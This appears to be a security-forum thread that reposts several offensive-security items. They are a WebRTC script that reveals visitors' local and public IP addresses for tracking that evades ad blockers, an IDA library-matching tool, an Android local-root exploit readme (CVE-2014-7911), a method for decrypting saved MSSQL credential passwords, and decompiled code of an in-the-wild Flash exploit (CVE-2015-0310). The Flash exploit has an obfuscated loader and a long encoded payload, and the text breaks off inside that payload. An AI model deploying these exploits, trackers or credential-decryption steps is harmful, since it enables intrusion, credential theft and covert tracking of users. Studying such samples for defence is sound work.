Nytro

Get local and public IP addresses in JavaScript STUN IP Address requests for WebRTC Demo: https://diafygi.github.io/webrtc-ips/ What this does Firefox and Chrome have implemented WebRTC that allow requests to STUN servers be made that will return the local and public IP addresses for the user. These request results are available to javascript, so you can now obtain a users local and public IP addresses in javascript. This demo is an example implementation of that. Additionally, these STUN requests are made outside of the normal XMLHttpRequest procedure, so they are not visible in the developer console or able to be blocked by plugins such as AdBlockPlus or Ghostery. This makes these types of requests available for online tracking if an advertiser sets up a STUN server with a wildcard domain. Code Here is the annotated demo function that makes the STUN request. You can copy and paste this into the Firefox or Chrome developer console to run the test. //get the IP addresses associated with an account function getIPs(callback){ var ip_dups = {}; //compatibility for firefox and chrome var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; var mediaConstraints = { optional: [{RtpDataChannels: true}] }; //firefox already has a default stun server in about:config // media.peerconnection.default_iceservers = // [{"url": "stun:stun.services.mozilla.com"}] var servers = undefined; //add same stun server for chrome if(window.webkitRTCPeerConnection) servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]}; //construct a new RTCPeerConnection var pc = new RTCPeerConnection(servers, mediaConstraints); //listen for candidate events pc.onicecandidate = function(ice){ //skip non-candidate events if(ice.candidate){ //match just the IP address var ip_regex = /([0-9]{1,3}([B]\.[/B][0-9]{1,3}){3})/ var ip_addr = ip_regex.exec(ice.candidate.candidate)[1]; //remove duplicates if(ip_dups[ip_addr] === undefined) callback(ip_addr); ip_dups[ip_addr] = true; } }; //create a bogus data channel pc.createDataChannel(""); //create an offer sdp pc.createOffer(function(result){ //trigger the stun server request pc.setLocalDescription(result, function(){}); }, function(){}); } //Test: Print the IP addresses into the console getIPs(function(ip){console.log(ip);}); Sursa: https://github.com/diafygi/webrtc-ips

Statically linked Library detector slid All sample code is in the sample_code folder All screenshots are in the screenshots folder All code was tested on IDA PRO 6.4 on Windows 7. All commands are to be run from the Windows CMD prompt Sample code was compiled on Ubuntu 12.04 and gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) Get a list of all the functions and their instructions for the binary you want to reverse as well as all the libraries that you think may be part of it. Before running this script, make sure you have the binary you want to reverse as well as all the libraries you think are a part of the binary in the"C:\data\IDBstore" directory. For the code I used I put the test binary as well as all the files from the libc.a archive into the directory "C:\data\IDBstore". The libc.a archive was found on my system at /usr/lib/x86_64-linux-gnu/libc.a. The files from this archive can be extracted by using the command ar x /usr/lib/x86_64-linux-gnu/libc.a FOR %x IN ("C:\data\IDBstore*") do idaw64 -A -L"C:\data\log.txt" -S"C:\data\save_disasm.py" "%x" The result of running this script will store the disassembly of the binary to be reversed and a lot of the associated libraries in a folder called input. Look at 01.png for the result of this script. Compare functions of the binary with the functions of all the libraries. In the example below, the output of the statically linked binary is test_mnem.txt. The -m option compares only the mnemonics of all the functions. python function_compare.py test_mnem.txt -m The result of running this script will be stored in a new file called input_to_rename_function.txt. Look at 02.png for the result of this script. Use the output obtained from the previous script to accordingly rename functions inside IDA. Look at 03.png and 04.png before running this script. The line numbers show the starting (1039) and ending line numbers(1159) for sub_ functions. This means there are 120 functions. 05.png is a screenshot that shows how to run this script. idaw64 -A -L""C:\data\log.txt" -S"C:\data\rename.py" test The result of running this script is that all the functions that started with sub_ inside the binary to be reversed AND found a match with some library somewhere will be renamed. Open up the saved IDB as usual - you will see that a number of functions have been renamed. Look at 06.png and 07.png for the result of this script. The line numbers show the starting (1120) and ending line numbers(1159) for sub_ functions. This means that there are now 39 functions. This means that 81 functions were renamed because they matched some function inside libc.a. Look at 08.png and 09.png for examples of how the names of the functions look once they have been renamed. The functions whose names start with single are named because only a single match was found in libc.a. The functions whose names start with multiple are named because multiple matches were found in libc.a. Sursa: https://github.com/arvinddoraiswamy/slid

CVE-2014-7911_pocA Local root exploit for Nexus5 Android 4.4.4(KTU8P) author: retme (retme7@gmail.com) [font=Helvetica Neue @returnsme on twitter & @retme on weibo website: retme.net BUG info Full Disclosure: CVE-2014-7911: Android <5.0 Privilege Escalation using ObjectInputStream Analysis CVE-2014-7911 – A Deep Dive Analysis of Android System Service Vulnerability and Exploitation - Palo Alto Networks BlogPalo Alto Networks Blog Sursa: https://github.com/retme7/CVE-2014-7911_poc

Decrypting MSSQL Credential Passwords Antti Rantasaari | January 26, 2015 A while ago I posted a blog on how to decrypt SQL Server link passwords (https://blog.netspi.com/decrypting-mssql-database-link-server-passwords/). By using the same technique it is possible to decrypt passwords for SQL Server Credentials as well. I modified the previously released password decryption script a little, namely by just changing the location where the encrypted passwords are stored, and released an updated PowerShell script for Credential decryption. Similar remarks as with link password decryption… From the offensive point of view, this is pretty far into post exploitation as sysadmin privileges are needed on the SQL server and local administrator privileges are needed on the Windows server. From the defensive point of view, I guess this would be just another reminder that there is a way to disclose most saved passwords. So do not leave unnecessary credentials on database servers and do not grant excessive privileges for credentials used to access external resources. SQL Server Credentials Microsoft SQL Server allows users to add Credentials to a database. The credentials, typically Windows usernames and passwords, can be used to access resources outside SQL Server. A single credential can be used by multiple SQL logins for external access. A simple example of credential use is the SQL Server proxy account. When xp_cmdshell is executed, by default it uses the permissions of the SQL Server service account. However, by configuring a proxy account for the server, it is possible to set xp_cmdshell to use a least privileged account for OS access rather than (quite often excessive) service account permissions. When credentials are added to a SQL Server, passwords have to be saved to the database using reversible encryption to allow for proper use of the credentials. It is possible to decrypt saved credentials password as explained in this blog. Credential Password Storage MSSQL stores credential passwords to the master.sys.sysobjvalues table. I was able to figure out the location of the encrypted passwords after looking at the definition of the master.sys.credentials view using the following query: Microsoft gives a pretty vague description for the table: “Exists in every database. Contains a row for each general value property of an entity.” Master.sys.sysobjvalues has a lot of data in it, but credential information appears to have valueclass 28. And encrypted passwords are stored in imageval column with valclass=28 and valnum=2. I could not find documentation about valclass and valnum but those values seemed to work on my test systems. The master.sys.sysobjvalues table cannot be accessed using a normal SQL connection, but rather a Dedicated Administrative Connection (DAC) is needed (more information about DAC at http://technet.microsoft.com/en-us/library/ms178068%28v=sql.105%29.aspx). MSSQL Encryption MSSQL encryption basics were detailed in my previous blog (https://blog.netspi.com/decrypting-mssql-database-link-server-passwords/). In a nutshell, the credential passwords are encrypted using Service Master Key (SMK) which can be obtained from the server using DPAPI. Decrypting Credential Passwords Depending on the version of the MSSQL server, the credential passwords are encrypted using AES (MSSQL 2012+) or 3DES (MSSQL 2008 and older). Passwords stored in sys.sysobjvalues imageval column must be parsed a little prior to decryption (luckily exactly the same way as link server passwords). After the parsing credential passwords can be decrypted using the SMK. Decrypting Credential Passwords with PowerShell – Get-MSSQLCredentialPasswords.psm1 A little modified version of “Get-MSSQLLinkPasswords.psm1?, unsurprisingly named “Get-MSSQLCredentialPasswords.psm1”, automates credential password decryption. The script can be downloaded from GitHub here: https://github.com/NetSPI/Powershell-Modules/blob/master/Get-MSSQLCredentialPasswords.psm1 The script must be run locally on the MSSQL server (as DPAPI requires access to the local machine key). The user executing the script must also have sysadmin access to all the database instances (for the DAC connection) and local admin privileges on the Windows server (to access the entropy bytes in registry). In addition, if UAC is enabled, the script must be ran as an administrator. Below is a summary of the process used by the script. Identify all of the MSSQL instances on the server. Attempt to create a DAC connection to each instance. Select the encrypted credential passwords from the “imageval” column of the “master.sys.sysobjvalues” table for each instance. Select the encrypted Service Master Key (SMK) from the “master.sys.key_encryptions” table of each instance where the “key_id” column is equal to 102. Select the version that has been encrypted as LocalMachine based on the “thumbprint” column. Extract the entropy value from the registry location HKLM:\\SOFTWARE\Microsoft\Microsoft SQL Server\[instancename]\Security\Entropy. Use the information to decrypt the SMK. The script determines the encryption algorithm (AES or 3DES) used to encrypt the SMK based on SQL Server version and SMK key length. Use the SMK to decrypt the credential passwords. If successful, the script displays the cleartext credential passwords. Below is an example of the end result: PS C:\> Get-MSSQLCredentialPasswords | out-gridview I’ve tested the script with MSSQL 2008 and 2012. There might be some bugs, but it appears to work reliably. Please let me know if you notice any errors or if I did not account for certain situations etc. Sursa: https://blog.netspi.com/decrypting-mssql-credential-passwords/

Exploit.SWF CVE-2015-0310 Code [/B][/FONT][/COLOR]@PhysicalDrive0 package { import flash.display.*; import flash.events.*; public class ep extends MovieClip { public static var ggew; public function ep(){ if (this.stage){ this.wweg(); } else { this.addEventListener(Event.ADDED_TO_STAGE, this.wweg); }; } private function InitEx():void{ ggew = jtyk.xxfrh(); var _local2:* = kryuje.wecy(); var _local3:* = /[3041526978]+/g; var _local4:* = "62l36z48a67d63B5m46t3e27s42".replace(_local3, ""); _local4 = _local4.replace("z", "o"); _local4 = _local4.replace("m", "y"); _local2[_local4](ggew); this.stage.addChild(_local2); } private function wweg(_arg1:Event=null):void{ this.removeEventListener(Event.ADDED_TO_STAGE, this.wweg); this.InitEx(); //unresolved jump !ERROR! } } ep = [OP_NEWCLASS ClassInfo:0 base:MovieClip]; kryuje = [OP_NEWCLASS ClassInfo:1 base:Object]; jtyk = [OP_NEWCLASS ClassInfo:2 base:Object]; }//package import flash.display.*; import flash.utils.*; package { public class kryuje { public static function wecy():Loader{ var _local1:* = new Loader(); return (_local1); } } }//package package { public final class jtyk { private static var ejtey:jtyk; public var ybe:String; public var vree:Class; public var weruji:String; public var fhrw:String; public var wxwrtu:String; public var erh:String; public var jetk:String; public var wxyhw:String; public var eruuf:String; public function jtyk(){ this.ybe = "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